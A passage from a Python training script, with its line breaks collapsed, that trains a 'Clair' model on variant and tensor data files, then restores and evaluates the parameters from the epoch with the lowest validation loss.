Optimizer: {}".format(optimizer)) logging.info("[INFO] Loss Function: {}".format(loss_function)) m = Clair( optimizer_name=optimizer, loss_function=loss_function ) m.init() dataset_info = utils.dataset_info_from( binary_file_path=args.bin_fn, tensor_file_path=args.tensor_fn, variant_file_path=args.var_fn, bed_file_path=args.bed_fn, train_binary_file_path=args.train_bin_fn, validation_binary_file_path=args.validation_bin_fn, ) training_config = utils.TrainingConfig( dataset_info=dataset_info, learning_rate=args.learning_rate, l2_regularization_lambda=args.lambd, output_file_path_prefix=args.ochk_prefix, model_initalization_file_path=args.chkpnt_fn, summary_writer=m.get_summary_file_writer(args.olog_dir) if args.olog_dir != None else None, ) _training_losses, validation_losses = train_model(m, training_config) # show the parameter set with the smallest validation loss validation_losses.sort() best_validation_epoch = validation_losses[0][1] logging.info("[INFO] Best validation loss at epoch: %d" % best_validation_epoch) # load best validation model and evaluate it model_file_path = "%s-%%0%dd" % (training_config.output_file_path_prefix, param.parameterOutputPlaceHolder) best_validation_model_file_path = model_file_path % best_validation_epoch m.restore_parameters(os.path.abspath(best_validation_model_file_path)) evaluate.evaluate_model(m, dataset_info) if __name__ == "__main__": main()